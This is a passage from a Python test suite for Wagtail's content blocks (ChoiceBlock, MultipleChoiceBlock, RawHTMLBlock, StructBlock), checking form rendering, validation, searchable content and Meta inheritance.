self.assertTagInHTML('<select id="beverage" name="beverage" placeholder="">', html)
self.assertNotIn('<option value="">%s</option>' % self.blank_choice_dash_label, html)
self.assertNotInHTML('<option value="" selected="selected">%s</option>' % self.blank_choice_dash_label, html)
self.assertIn('<optgroup label="Alcoholic">', html)
self.assertIn('<option value="tea">Tea</option>', html)
self.assertInHTML('<option value="" selected="selected">No thanks</option>', html)
# test rendering with a non-blank option selected
html = block.render_form('tea', prefix='beverage')
self.assertTagInHTML('<select id="beverage" name="beverage" placeholder="">', html)
self.assertNotIn('<option value="">%s</option>' % self.blank_choice_dash_label, html)
self.assertNotInHTML('<option value="" selected="selected">%s</option>' % self.blank_choice_dash_label, html)
self.assertIn('<optgroup label="Alcoholic">', html)
self.assertInHTML('<option value="tea" selected="selected">Tea</option>', html)
def test_subclassing(self):
class BeverageChoiceBlock(blocks.ChoiceBlock):
choices = [
('tea', 'Tea'),
('coffee', 'Coffee'),
]
block = BeverageChoiceBlock(required=False)
html = block.render_form('tea', prefix='beverage')
self.assertTagInHTML('<select id="beverage" name="beverage" placeholder="">', html)
self.assertInHTML('<option value="tea" selected="selected">Tea</option>', html)
# subclasses of ChoiceBlock should deconstruct to a basic ChoiceBlock for migrations
self.assertEqual(
block.deconstruct(),
(
'wagtail.core.blocks.ChoiceBlock',
[],
{
'choices': [('tea', 'Tea'), ('coffee', 'Coffee')],
'required': False,
},
)
)
def test_searchable_content(self):
block = blocks.ChoiceBlock(choices=[
('choice-1', "Choice 1"),
('choice-2', "Choice 2"),
])
self.assertEqual(block.get_searchable_content("choice-1"),
["Choice 1"])
def test_searchable_content_with_callable_choices(self):
def callable_choices():
return [
('choice-1', "Choice 1"),
('choice-2', "Choice 2"),
]
block = blocks.ChoiceBlock(choices=callable_choices)
self.assertEqual(block.get_searchable_content("choice-1"),
["Choice 1"])
def test_optgroup_searchable_content(self):
block = blocks.ChoiceBlock(choices=[
('Section 1', [
('1-1', "Block 1"),
('1-2', "Block 2"),
]),
('Section 2', [
('2-1', "Block 1"),
('2-2', "Block 2"),
]),
])
self.assertEqual(block.get_searchable_content("2-2"),
["Section 2", "Block 2"])
def test_invalid_searchable_content(self):
block = blocks.ChoiceBlock(choices=[
('one', 'One'),
('two', 'Two'),
])
self.assertEqual(block.get_searchable_content('three'), [])
def test_searchable_content_with_lazy_translation(self):
block = blocks.ChoiceBlock(choices=[
('choice-1', __("Choice 1")),
('choice-2', __("Choice 2")),
])
result = block.get_searchable_content("choice-1")
# result must survive JSON (de)serialisation, which is not the case for
# lazy translation objects
result = json.loads(json.dumps(result))
self.assertEqual(result, ["Choice 1"])
def test_optgroup_searchable_content_with_lazy_translation(self):
block = blocks.ChoiceBlock(choices=[
(__('Section 1'), [
('1-1', __("Block 1")),
('1-2', __("Block 2")),
]),
(__('Section 2'), [
('2-1', __("Block 1")),
('2-2', __("Block 2")),
]),
])
result = block.get_searchable_content("2-2")
# result must survive JSON (de)serialisation, which is not the case for
# lazy translation objects
result = json.loads(json.dumps(result))
self.assertEqual(result, ["Section 2", "Block 2"])
def test_deconstruct_with_callable_choices(self):
def callable_choices():
return [
('tea', 'Tea'),
('coffee', 'Coffee'),
]
block = blocks.ChoiceBlock(choices=callable_choices, required=False)
html = block.render_form('tea', prefix='beverage')
self.assertTagInHTML('<select id="beverage" name="beverage" placeholder="">', html)
self.assertInHTML('<option value="tea" selected="selected">Tea</option>', html)
self.assertEqual(
block.deconstruct(),
(
'wagtail.core.blocks.ChoiceBlock',
[],
{
'choices': callable_choices,
'required': False,
},
)
)
def test_render_with_validator(self):
choices = [
('tea', 'Tea'),
('coffee', 'Coffee'),
]
def validate_tea_is_selected(value):
raise ValidationError("You must select 'tea'")
block = blocks.ChoiceBlock(choices=choices, validators=[validate_tea_is_selected])
with self.assertRaises(ValidationError):
block.clean('coffee')
class TestMultipleChoiceBlock(WagtailTestUtils, SimpleTestCase):
def setUp(self):
from django.db.models.fields import BLANK_CHOICE_DASH
self.blank_choice_dash_label = BLANK_CHOICE_DASH[0][1]
def test_render_required_multiple_choice_block(self):
block = blocks.MultipleChoiceBlock(choices=[('tea', 'Tea'), ('coffee', 'Coffee')])
html = block.render_form('coffee', prefix='beverage')
self.assertTagInHTML('<select multiple id="beverage" name="beverage" placeholder="">', html)
self.assertIn('<option value="tea">Tea</option>', html)
self.assertInHTML('<option value="coffee" selected="selected">Coffee</option>', html)
def test_render_required_multiple_choice_block_with_default(self):
block = blocks.MultipleChoiceBlock(choices=[('tea', 'Tea'), ('coffee', 'Coffee')], default='tea')
html = block.render_form('coffee', prefix='beverage')
self.assertTagInHTML('<select multiple id="beverage" name="beverage" placeholder="">', html)
self.assertIn('<option value="tea">Tea</option>', html)
self.assertInHTML('<option value="coffee" selected="selected">Coffee</option>', html)
def test_render_required_multiple_choice_block_with_callable_choices(self):
def callable_choices():
return [('tea', 'Tea'), ('coffee', 'Coffee')]
block = blocks.MultipleChoiceBlock(choices=callable_choices)
html = block.render_form('coffee', prefix='beverage')
self.assertTagInHTML('<select multiple id="beverage" name="beverage" placeholder="">', html)
self.assertIn('<option value="tea">Tea</option>', html)
self.assertInHTML('<option value="coffee" selected="selected">Coffee</option>', html)
def test_validate_required_multiple_choice_block(self):
block = blocks.MultipleChoiceBlock(choices=[('tea', 'Tea'), ('coffee', 'Coffee')])
self.assertEqual(block.clean(['coffee']), ['coffee'])
with self.assertRaises(ValidationError):
block.clean(['whisky'])
with self.assertRaises(ValidationError):
block.clean('')
with self.assertRaises(ValidationError):
block.clean(None)
def test_render_non_required_multiple_choice_block(self):
block = blocks.MultipleChoiceBlock(choices=[('tea', 'Tea'), ('coffee', 'Coffee')], required=False)
html = block.render_form('coffee', prefix='beverage')
self.assertTagInHTML('<select multiple id="beverage" name="beverage" placeholder="">', html)
self.assertIn('<option value="tea">Tea</option>', html)
self.assertInHTML('<option value="coffee" selected="selected">Coffee</option>', html)
def test_render_non_required_multiple_choice_block_with_callable_choices(self):
def callable_choices():
return [('tea', 'Tea'), ('coffee', 'Coffee')]
block = blocks.MultipleChoiceBlock(choices=callable_choices, required=False)
html = block.render_form('coffee', prefix='beverage')
self.assertTagInHTML('<select multiple id="beverage" name="beverage" placeholder="">', html)
self.assertIn('<option value="tea">Tea</option>', html)
self.assertInHTML('<option value="coffee" selected="selected">Coffee</option>', html)
def test_validate_non_required_multiple_choice_block(self):
block = blocks.MultipleChoiceBlock(choices=[('tea', 'Tea'), ('coffee', 'Coffee')], required=False)
self.assertEqual(block.clean(['coffee']), ['coffee'])
with self.assertRaises(ValidationError):
block.clean(['whisky'])
self.assertEqual(block.clean(''), [])
self.assertEqual(block.clean(None), [])
def test_render_multiple_choice_block_with_existing_blank_choice(self):
block = blocks.MultipleChoiceBlock(
choices=[('tea', 'Tea'), ('coffee', 'Coffee'), ('', 'No thanks')],
required=False)
html = block.render_form("", prefix='beverage')
self.assertTagInHTML('<select multiple id="beverage" name="beverage" placeholder="">', html)
self.assertNotIn('<option value="">%s</option>' % self.blank_choice_dash_label, html)
self.assertInHTML('<option value="" selected="selected">No thanks</option>', html)
self.assertIn('<option value="tea">Tea</option>', html)
self.assertInHTML('<option value="coffee">Coffee</option>', html)
def test_render_multiple_choice_block_with_existing_blank_choice_and_with_callable_choices(self):
def callable_choices():
return [('tea', 'Tea'), ('coffee', 'Coffee'), ('', 'No thanks')]
block = blocks.MultipleChoiceBlock(
choices=callable_choices,
required=False)
html = block.render_form("", prefix='beverage')
self.assertTagInHTML('<select multiple id="beverage" name="beverage" placeholder="">', html)
self.assertNotIn('<option value="">%s</option>' % self.blank_choice_dash_label, html)
self.assertInHTML('<option value="" selected="selected">No thanks</option>', html)
self.assertIn('<option value="tea">Tea</option>', html)
self.assertIn('<option value="coffee">Coffee</option>', html)
def test_named_groups_without_blank_option(self):
block = blocks.MultipleChoiceBlock(
choices=[
('Alcoholic', [
('gin', 'Gin'),
('whisky', 'Whisky'),
]),
('Non-alcoholic', [
('tea', 'Tea'),
('coffee', 'Coffee'),
]),
])
# test rendering with the blank option selected
html = block.render_form(None, prefix='beverage')
self.assertTagInHTML('<select multiple id="beverage" name="beverage" placeholder="">', html)
self.assertIn('<optgroup label="Alcoholic">', html)
self.assertIn('<option value="tea">Tea</option>', html)
# test rendering with a non-blank option selected
html = block.render_form('tea', prefix='beverage')
self.assertTagInHTML('<select multiple id="beverage" name="beverage" placeholder="">', html)
self.assertIn('<optgroup label="Alcoholic">', html)
self.assertInHTML('<option value="tea" selected="selected">Tea</option>', html)
def test_named_groups_with_blank_option(self):
block = blocks.MultipleChoiceBlock(
choices=[
('Alcoholic', [
('gin', 'Gin'),
('whisky', 'Whisky'),
]),
('Non-alcoholic', [
('tea', 'Tea'),
('coffee', 'Coffee'),
]),
('Not thirsty', [
('', 'No thanks')
]),
],
required=False)
# test rendering with the blank option selected
html = block.render_form(None, prefix='beverage')
self.assertTagInHTML('<select multiple id="beverage" name="beverage" placeholder="">', html)
self.assertNotIn('<option value="">%s</option>' % self.blank_choice_dash_label, html)
self.assertIn('<optgroup label="Alcoholic">', html)
self.assertIn('<option value="tea">Tea</option>', html)
# test rendering with a non-blank option selected
html = block.render_form('tea', prefix='beverage')
self.assertTagInHTML('<select multiple id="beverage" name="beverage" placeholder="">', html)
self.assertNotIn('<option value="">%s</option>' % self.blank_choice_dash_label, html)
self.assertNotInHTML('<option value="" selected="selected">%s</option>' % self.blank_choice_dash_label, html)
self.assertIn('<optgroup label="Alcoholic">', html)
self.assertInHTML('<option value="tea" selected="selected">Tea</option>', html)
def test_subclassing(self):
class BeverageMultipleChoiceBlock(blocks.MultipleChoiceBlock):
choices = [
('tea', 'Tea'),
('coffee', 'Coffee'),
]
block = BeverageMultipleChoiceBlock(required=False)
html = block.render_form('tea', prefix='beverage')
self.assertTagInHTML('<select multiple id="beverage" name="beverage" placeholder="">', html)
self.assertInHTML('<option value="tea" selected="selected">Tea</option>', html)
# subclasses of MultipleChoiceBlock should deconstruct to a basic MultipleChoiceBlock for migrations
self.assertEqual(
block.deconstruct(),
(
'wagtail.core.blocks.MultipleChoiceBlock',
[],
{
'choices': [('tea', 'Tea'), ('coffee', 'Coffee')],
'required': False,
},
)
)
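# Illustrative note (not part of the test suite): the deconstruct() tuple asserted above is
# what Django migrations persist. Rebuilding the block from it is roughly:
#
#     path, args, kwargs = block.deconstruct()
#     # path == 'wagtail.core.blocks.MultipleChoiceBlock'
#     rebuilt = blocks.MultipleChoiceBlock(*args, **kwargs)
#
# i.e. the subclass collapses back to the base MultipleChoiceBlock plus its 'choices'
# and 'required' kwargs.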
def test_searchable_content(self):
block = blocks.MultipleChoiceBlock(choices=[
('choice-1', "Choice 1"),
('choice-2', "Choice 2"),
])
self.assertEqual(block.get_searchable_content("choice-1"),
["Choice 1"])
def test_searchable_content_with_callable_choices(self):
def callable_choices():
return [
('choice-1', "Choice 1"),
('choice-2', "Choice 2"),
]
block = blocks.MultipleChoiceBlock(choices=callable_choices)
self.assertEqual(block.get_searchable_content("choice-1"),
["Choice 1"])
def test_optgroup_searchable_content(self):
block = blocks.MultipleChoiceBlock(choices=[
('Section 1', [
('1-1', "Block 1"),
('1-2', "Block 2"),
]),
('Section 2', [
('2-1', "Block 1"),
('2-2', "Block 2"),
]),
])
self.assertEqual(block.get_searchable_content("2-2"),
["Section 2", "Block 2"])
def test_invalid_searchable_content(self):
block = blocks.MultipleChoiceBlock(choices=[
('one', 'One'),
('two', 'Two'),
])
self.assertEqual(block.get_searchable_content('three'), [])
def test_searchable_content_with_lazy_translation(self):
block = blocks.MultipleChoiceBlock(choices=[
('choice-1', __("Choice 1")),
('choice-2', __("Choice 2")),
])
result = block.get_searchable_content("choice-1")
# result must survive JSON (de)serialisation, which is not the case for
# lazy translation objects
result = json.loads(json.dumps(result))
self.assertEqual(result, ["Choice 1"])
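# Illustrative note: the json.dumps/json.loads round trip above is the point of this test;
# a lazy translation proxy (the __('Choice 1') label) is typically not JSON serialisable
# as-is, so get_searchable_content is expected to return plain strings instead.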
def test_optgroup_searchable_content_with_lazy_translation(self):
block = blocks.MultipleChoiceBlock(choices=[
(__('Section 1'), [
('1-1', __("Block 1")),
('1-2', __("Block 2")),
]),
(__('Section 2'), [
('2-1', __("Block 1")),
('2-2', __("Block 2")),
]),
])
result = block.get_searchable_content("2-2")
# result must survive JSON (de)serialisation, which is not the case for
# lazy translation objects
result = json.loads(json.dumps(result))
self.assertEqual(result, ["Section 2", "Block 2"])
def test_deconstruct_with_callable_choices(self):
def callable_choices():
return [
('tea', 'Tea'),
('coffee', 'Coffee'),
]
block = blocks.MultipleChoiceBlock(choices=callable_choices, required=False)
html = block.render_form('tea', prefix='beverage')
self.assertTagInHTML('<select multiple id="beverage" name="beverage" placeholder="">', html)
self.assertInHTML('<option value="tea" selected="selected">Tea</option>', html)
self.assertEqual(
block.deconstruct(),
(
'wagtail.core.blocks.MultipleChoiceBlock',
[],
{
'choices': callable_choices,
'required': False,
},
)
)
def test_render_with_validator(self):
choices = [
('tea', 'Tea'),
('coffee', 'Coffee'),
]
def validate_tea_is_selected(value):
raise ValidationError("You must select 'tea'")
block = blocks.MultipleChoiceBlock(choices=choices, validators=[validate_tea_is_selected])
with self.assertRaises(ValidationError):
block.clean('coffee')
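# A minimal sketch (assumed usage, not asserted by the tests) of a validator that only
# complains when 'tea' is missing, rather than unconditionally as above:
#
#     def validate_tea_is_selected(value):
#         if 'tea' not in value:
#             raise ValidationError("You must select 'tea'")
#
#     blocks.MultipleChoiceBlock(choices=choices, validators=[validate_tea_is_selected])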
class TestRawHTMLBlock(unittest.TestCase):
def test_get_default_with_fallback_value(self):
default_value = blocks.RawHTMLBlock().get_default()
self.assertEqual(default_value, '')
self.assertIsInstance(default_value, SafeData)
def test_get_default_with_none(self):
default_value = blocks.RawHTMLBlock(default=None).get_default()
self.assertEqual(default_value, '')
self.assertIsInstance(default_value, SafeData)
def test_get_default_with_empty_string(self):
default_value = blocks.RawHTMLBlock(default='').get_default()
self.assertEqual(default_value, '')
self.assertIsInstance(default_value, SafeData)
def test_get_default_with_nonempty_string(self):
default_value = blocks.RawHTMLBlock(default='<blink>BÖÖM</blink>').get_default()
self.assertEqual(default_value, '<blink>BÖÖM</blink>')
self.assertIsInstance(default_value, SafeData)
def test_serialize(self):
block = blocks.RawHTMLBlock()
result = block.get_prep_value(mark_safe('<blink>BÖÖM</blink>'))
self.assertEqual(result, '<blink>BÖÖM</blink>')
self.assertNotIsInstance(result, SafeData)
def test_deserialize(self):
block = blocks.RawHTMLBlock()
result = block.to_python('<blink>BÖÖM</blink>')
self.assertEqual(result, '<blink>BÖÖM</blink>')
self.assertIsInstance(result, SafeData)
def test_render(self):
block = blocks.RawHTMLBlock()
result = block.render(mark_safe('<blink>BÖÖM</blink>'))
self.assertEqual(result, '<blink>BÖÖM</blink>')
self.assertIsInstance(result, SafeData)
def test_render_form(self):
block = blocks.RawHTMLBlock()
result = block.render_form(mark_safe('<blink>BÖÖM</blink>'), prefix='rawhtml')
self.assertIn('<textarea ', result)
self.assertIn('name="rawhtml"', result)
self.assertIn('<blink>BÖÖM</blink>', result)
def test_form_response(self):
block = blocks.RawHTMLBlock()
result = block.value_from_datadict({'rawhtml': '<blink>BÖÖM</blink>'}, {}, prefix='rawhtml')
self.assertEqual(result, '<blink>BÖÖM</blink>')
self.assertIsInstance(result, SafeData)
def test_value_omitted_from_data(self):
block = blocks.RawHTMLBlock()
self.assertFalse(block.value_omitted_from_data({'rawhtml': 'ohai'}, {}, 'rawhtml'))
self.assertFalse(block.value_omitted_from_data({'rawhtml': ''}, {}, 'rawhtml'))
self.assertTrue(block.value_omitted_from_data({'nothing-here': 'nope'}, {}, 'rawhtml'))
def test_clean_required_field(self):
block = blocks.RawHTMLBlock()
result = block.clean(mark_safe('<blink>BÖÖM</blink>'))
self.assertEqual(result, '<blink>BÖÖM</blink>')
self.assertIsInstance(result, SafeData)
with self.assertRaises(ValidationError):
block.clean(mark_safe(''))
def test_clean_nonrequired_field(self):
block = blocks.RawHTMLBlock(required=False)
result = block.clean(mark_safe('<blink>BÖÖM</blink>'))
self.assertEqual(result, '<blink>BÖÖM</blink>')
self.assertIsInstance(result, SafeData)
result = block.clean(mark_safe(''))
self.assertEqual(result, '')
self.assertIsInstance(result, SafeData)
def test_render_with_validator(self):
def validate_contains_foo(value):
if 'foo' not in value:
raise ValidationError("Value must contain 'foo'")
block = blocks.RawHTMLBlock(validators=[validate_contains_foo])
with self.assertRaises(ValidationError):
block.clean(mark_safe('<p>bar</p>'))
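# RawHTMLBlock round trip in a nutshell (illustrative, based on the assertions above):
#
#     block = blocks.RawHTMLBlock()
#     stored = block.get_prep_value(mark_safe('<blink>hi</blink>'))  # plain str for storage
#     value = block.to_python(stored)                                # marked safe again
#     block.render(value)                                            # output verbatim, unescaped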
class TestMeta(unittest.TestCase):
def test_set_template_with_meta(self):
class HeadingBlock(blocks.CharBlock):
class Meta:
template = 'heading.html'
block = HeadingBlock()
self.assertEqual(block.meta.template, 'heading.html')
def test_set_template_with_constructor(self):
block = blocks.CharBlock(template='heading.html')
self.assertEqual(block.meta.template, 'heading.html')
def test_set_template_with_constructor_overrides_meta(self):
class HeadingBlock(blocks.CharBlock):
class Meta:
template = 'heading.html'
block = HeadingBlock(template='subheading.html')
self.assertEqual(block.meta.template, 'subheading.html')
def test_meta_nested_inheritance(self):
"""
Check that having a multi-level inheritance chain works
"""
class HeadingBlock(blocks.CharBlock):
class Meta:
template = 'heading.html'
test = 'Foo'
class SubHeadingBlock(HeadingBlock):
class Meta:
template = 'subheading.html'
block = SubHeadingBlock()
self.assertEqual(block.meta.template, 'subheading.html')
self.assertEqual(block.meta.test, 'Foo')
def test_meta_multi_inheritance(self):
"""
Check that multi-inheritance and Meta classes work together
"""
class LeftBlock(blocks.CharBlock):
class Meta:
template = 'template.html'
clash = 'the band'
label = 'Left block'
class RightBlock(blocks.CharBlock):
class Meta:
default = 'hello'
clash = 'the album'
label = 'Right block'
class ChildBlock(LeftBlock, RightBlock):
class Meta:
label = 'Child block'
block = ChildBlock()
# These should be directly inherited from the LeftBlock/RightBlock
self.assertEqual(block.meta.template, 'template.html')
self.assertEqual(block.meta.default, 'hello')
# This should be inherited from the LeftBlock, solving the collision,
# as LeftBlock comes first
self.assertEqual(block.meta.clash, 'the band')
# This should come from ChildBlock itself, ignoring the label on
# LeftBlock/RightBlock
self.assertEqual(block.meta.label, 'Child block')
class TestStructBlock(SimpleTestCase):
def test_initialisation(self):
block = blocks.StructBlock([
('title', blocks.CharBlock()),
('link', blocks.URLBlock()),
])
self.assertEqual(list(block.child_blocks.keys()), ['title', 'link'])
def test_initialisation_from_subclass(self):
class LinkBlock(blocks.StructBlock):
title = blocks.CharBlock()
link = blocks.URLBlock()
block = LinkBlock()
self.assertEqual(list(block.child_blocks.keys()), ['title', 'link'])
def test_initialisation_from_subclass_with_extra(self):
class LinkBlock(blocks.StructBlock):
title = blocks.CharBlock()
link = blocks.URLBlock()
block = LinkBlock([
('classname', blocks.CharBlock())
])
self.assertEqual(list(block.child_blocks.keys()), ['title', 'link', 'classname'])
def test_initialisation_with_multiple_subclasses(self):
class LinkBlock(blocks.StructBlock):
title = blocks.CharBlock()
link = blocks.URLBlock()
class StyledLinkBlock(LinkBlock):
classname = blocks.CharBlock()
block = StyledLinkBlock()
self.assertEqual(list(block.child_blocks.keys()), ['title', 'link', 'classname'])
def test_initialisation_with_mixins(self):
"""
The order of fields of classes with multiple parent classes is slightly
surprising at first. Child fields are inherited in a bottom-up order,
by traversing the MRO in reverse. In the example below,
``StyledLinkBlock`` will have an MRO of::
[StyledLinkBlock, StylingMixin, LinkBlock, StructBlock, ...]
This will result in ``classname`` appearing *after* ``title`` and
``link`` in ``StyledLinkBlock.child_blocks``, even though
``StylingMixin`` appeared before ``LinkBlock`` (see the sketch after this test).
"""
class LinkBlock(blocks.StructBlock):
title = blocks.CharBlock()
link = blocks.URLBlock()
class StylingMixin(blocks.StructBlock):
classname = blocks.CharBlock()
class StyledLinkBlock(StylingMixin, LinkBlock):
source = blocks.CharBlock()
block = StyledLinkBlock()
self.assertEqual(list(block.child_blocks.keys()),
['title', 'link', 'classname', 'source'])
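# Illustrative sketch of the ordering described in the docstring above:
#
#     StyledLinkBlock.__mro__
#     # (StyledLinkBlock, StylingMixin, LinkBlock, StructBlock, ...)
#
# Walking that MRO in reverse collects LinkBlock's fields first, then StylingMixin's,
# then StyledLinkBlock's own, giving ['title', 'link', 'classname', 'source'].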
def test_render(self):
class LinkBlock(blocks.StructBlock):
title = blocks.CharBlock()
link = blocks.URLBlock()
block = LinkBlock()
html = block.render(block.to_python({
'title': "Wagtail site",
'link': 'http://www.wagtail.io',
}))
expected_html = '\n'.join([
'<dl>',
'<dt>title</dt>',
'<dd>Wagtail site</dd>',
'<dt>link</dt>',
'<dd>http://www.wagtail.io</dd>',
'</dl>',
])
self.assertHTMLEqual(html, expected_html)
def test_get_api_representation_calls_same_method_on_fields_with_context(self):
"""
The get_api_representation method of a StructBlock should invoke
the block's get_api_representation method on each field and the
context should be passed on.
"""
class ContextBlock(blocks.CharBlock):
def get_api_representation(self, value, context=None):
return context[value]
class AuthorBlock(blocks.StructBlock):
language = ContextBlock()
author = ContextBlock()
block = AuthorBlock()
api_representation = block.get_api_representation(
{
'language': 'en',
'author': 'wagtail',
},
context={
'en': 'English',
'wagtail': 'Wagtail!'
}
)
self.assertDictEqual(
api_representation, {
'language': 'English',
'author': 'Wagtail!'
}
)
def test_render_unknown_field(self):
class LinkBlock(blocks.StructBlock):
title = blocks.CharBlock()
link = blocks.URLBlock()
block = LinkBlock()
html = block.render(block.to_python({
'title': "Wagtail site",
'link': 'http://www.wagtail.io',
'image': 10,
}))
self.assertIn('<dt>title</dt>', html)
self.assertIn('<dd>Wagtail site</dd>', html)
self.assertIn('<dt>link</dt>', html)
self.assertIn('<dd>http://www.wagtail.io</dd>', html)
# Don't render the extra item
self.assertNotIn('<dt>image</dt>', html)
def test_render_bound_block(self):
# the string representation of a bound block should be the value as rendered by
# the associated block
class SectionBlock(blocks.StructBlock):
title = blocks.CharBlock()
body = blocks.RichTextBlock()
block = SectionBlock()
struct_value = block.to_python({
'title': 'hello',
'body': '<b>world</b>',
})
body_bound_block = struct_value.bound_blocks['body']
expected = '<b>world</b>'
self.assertEqual(str(body_bound_block), expected)
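# Illustrative note: struct_value.bound_blocks maps each child name to a BoundBlock that
# pairs the child value with its block definition, so str() on a bound block (or
# value.bound_blocks.body in a template, as tested further down) gives the child block's
# own rendering rather than the raw value.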
def test_get_form_context(self):
class LinkBlock(blocks.StructBlock):
title = blocks.CharBlock()
link = blocks.URLBlock()
block = LinkBlock()
context = block.get_form_context(block.to_python({
'title': "Wagtail site",
'link': 'http://www.wagtail.io',
}), prefix='mylink')
self.assertTrue(isinstance(context['children'], collections.OrderedDict))
self.assertEqual(len(context['children']), 2)
self.assertTrue(isinstance(context['children']['title'], blocks.BoundBlock))
self.assertEqual(context['children']['title'].value, "Wagtail site")
self.assertTrue(isinstance(context['children']['link'], blocks.BoundBlock))
self.assertEqual(context['children']['link'].value, 'http://www.wagtail.io')
self.assertEqual(context['block_definition'], block)
self.assertEqual(context['prefix'], 'mylink')
def test_render_form(self):
class LinkBlock(blocks.StructBlock):
title = blocks.CharBlock(required=False)
link = blocks.URLBlock(required=False)
block = LinkBlock()
html = block.render_form(block.to_python({
'title': "Wagtail site",
'link': 'http://www.wagtail.io',
}), prefix='mylink')
self.assertIn('<div class="struct-block">', html)
self.assertIn('<div class="field char_field widget-text_input fieldname-title">', html)
self.assertIn('<label class="field__label" for="mylink-title">Title</label>', html)
self.assertInHTML(
'<input id="mylink-title" name="mylink-title" placeholder="Title" type="text" value="Wagtail site" />', html
)
self.assertIn('<div class="field url_field widget-url_input fieldname-link">', html)
self.assertInHTML(
(
'<input id="mylink-link" name="mylink-link" placeholder="Link"'
' type="url" value="http://www.wagtail.io" />'
),
html
)
self.assertNotIn('<li class="required">', html)
def test_custom_render_form_template(self):
class LinkBlock(blocks.StructBlock):
title = blocks.CharBlock(required=False)
link = blocks.URLBlock(required=False)
class Meta:
form_template = 'tests/block_forms/struct_block_form_template.html'
block = LinkBlock()
html = block.render_form(block.to_python({
'title': "Wagtail site",
'link': 'http://www.wagtail.io',
}), prefix='mylink')
self.assertIn('<div>Hello</div>', html)
self.assertHTMLEqual('<div>Hello</div>', html)
self.assertTrue(isinstance(html, SafeText))
def test_custom_render_form_template_jinja(self):
class LinkBlock(blocks.StructBlock):
title = blocks.CharBlock(required=False)
link = blocks.URLBlock(required=False)
class Meta:
form_template = 'tests/jinja2/struct_block_form_template.html'
block = LinkBlock()
html = block.render_form(block.to_python({
'title': "Wagtail site",
'link': 'http://www.wagtail.io',
}), prefix='mylink')
self.assertIn('<div>Hello</div>', html)
self.assertHTMLEqual('<div>Hello</div>', html)
self.assertTrue(isinstance(html, SafeText))
def test_render_required_field_indicator(self):
class LinkBlock(blocks.StructBlock):
title = blocks.CharBlock()
link = blocks.URLBlock(required=True)
block = LinkBlock()
html = block.render_form(block.to_python({
'title': "Wagtail site",
'link': 'http://www.wagtail.io',
}), prefix='mylink')
self.assertIn('<div class="field required">', html)
def test_render_form_unknown_field(self):
class LinkBlock(blocks.StructBlock):
title = blocks.CharBlock()
link = blocks.URLBlock()
block = LinkBlock()
html = block.render_form(block.to_python({
'title': "Wagtail site",
'link': 'http://www.wagtail.io',
'image': 10,
}), prefix='mylink')
self.assertInHTML(
(
'<input id="mylink-title" name="mylink-title" placeholder="Title"'
' type="text" value="Wagtail site" />'
),
html
)
self.assertInHTML(
(
'<input id="mylink-link" name="mylink-link" placeholder="Link" type="url"'
' value="http://www.wagtail.io" />'
),
html
)
# Don't render the extra field
self.assertNotIn('mylink-image', html)
def test_render_form_uses_default_value(self):
class LinkBlock(blocks.StructBlock):
title = blocks.CharBlock(default="Torchbox")
link = blocks.URLBlock(default="http://www.torchbox.com")
block = LinkBlock()
html = block.render_form(block.to_python({}), prefix='mylink')
self.assertInHTML(
'<input id="mylink-title" name="mylink-title" placeholder="Title" type="text" value="Torchbox" />', html
)
self.assertInHTML(
(
'<input id="mylink-link" name="mylink-link" placeholder="Link"'
' type="url" value="http://www.torchbox.com" />'
),
html
)
def test_render_form_with_help_text(self):
class LinkBlock(blocks.StructBlock):
title = blocks.CharBlock()
link = blocks.URLBlock()
class Meta:
help_text = "Self-promotion is encouraged"
block = LinkBlock()
html = block.render_form(block.to_python({
'title': "Wagtail site",
'link': 'http://www.wagtail.io',
}), prefix='mylink')
self.assertInHTML('<div class="help"> <svg class="icon icon-help default" aria-hidden="true" focusable="false"><use href="#icon-help"></use></svg> Self-promotion is encouraged</div>', html)
# check it can be overridden in the block constructor
block = LinkBlock(help_text="Self-promotion is discouraged")
html = block.render_form(block.to_python({
'title': "Wagtail site",
'link': 'http://www.wagtail.io',
}), prefix='mylink')
self.assertInHTML('<div class="help"> <svg class="icon icon-help default" aria-hidden="true" focusable="false"><use href="#icon-help"></use></svg> Self-promotion is discouraged</div>', html)
def test_media_inheritance(self):
class ScriptedCharBlock(blocks.CharBlock):
media = forms.Media(js=['scripted_char_block.js'])
class LinkBlock(blocks.StructBlock):
title = ScriptedCharBlock(default="Torchbox")
link = blocks.URLBlock(default="http://www.torchbox.com")
block = LinkBlock()
self.assertIn('scripted_char_block.js', ''.join(block.all_media().render_js()))
def test_html_declaration_inheritance(self):
class CharBlockWithDeclarations(blocks.CharBlock):
def html_declarations(self):
return '<script type="text/x-html-template">hello world</script>'
class LinkBlock(blocks.StructBlock):
title = CharBlockWithDeclarations(default="Torchbox")
link = blocks.URLBlock(default="http://www.torchbox.com")
block = LinkBlock()
self.assertIn('<script type="text/x-html-template">hello world</script>', block.all_html_declarations())
def test_searchable_content(self):
class LinkBlock(blocks.StructBlock):
title = blocks.CharBlock()
link = blocks.URLBlock()
block = LinkBlock()
content = block.get_searchable_content(block.to_python({
'title': "Wagtail site",
'link': 'http://www.wagtail.io',
}))
self.assertEqual(content, ["Wagtail site"])
def test_value_from_datadict(self):
block = blocks.StructBlock([
('title', blocks.CharBlock()),
('link', blocks.URLBlock()),
])
struct_val = block.value_from_datadict({
'mylink-title': "Torchbox",
'mylink-link': "http://www.torchbox.com"
}, {}, 'mylink')
self.assertEqual(struct_val['title'], "Torchbox")
self.assertEqual(struct_val['link'], "http://www.torchbox.com")
self.assertTrue(isinstance(struct_val, blocks.StructValue))
self.assertTrue(isinstance(struct_val.bound_blocks['link'].block, blocks.URLBlock))
def test_value_omitted_from_data(self):
block = blocks.StructBlock([
('title', blocks.CharBlock()),
('link', blocks.URLBlock()),
])
# overall value is considered present in the form if any sub-field is present
self.assertFalse(block.value_omitted_from_data({'mylink-title': 'Torchbox'}, {}, 'mylink'))
self.assertTrue(block.value_omitted_from_data({'nothing-here': 'nope'}, {}, 'mylink'))
def test_default_is_returned_as_structvalue(self):
"""When returning the default value of a StructBlock (e.g. because it's
a child of another StructBlock, and the outer value is missing that key)
we should receive it as a StructValue, not just a plain dict"""
class PersonBlock(blocks.StructBlock):
first_name = blocks.CharBlock()
surname = blocks.CharBlock()
class EventBlock(blocks.StructBlock):
title = blocks.CharBlock()
guest_speaker = PersonBlock(default={'first_name': 'Ed', 'surname': 'Balls'})
event_block = EventBlock()
event = event_block.to_python({'title': 'Birthday party'})
self.assertEqual(event['guest_speaker']['first_name'], 'Ed')
self.assertTrue(isinstance(event['guest_speaker'], blocks.StructValue))
def test_default_value_is_distinct_instance(self):
"""
Whenever the default value of a StructBlock is invoked, it should be a distinct
instance of the dict so that modifying it doesn't modify other places where the
default value appears.
"""
class PersonBlock(blocks.StructBlock):
first_name = blocks.CharBlock()
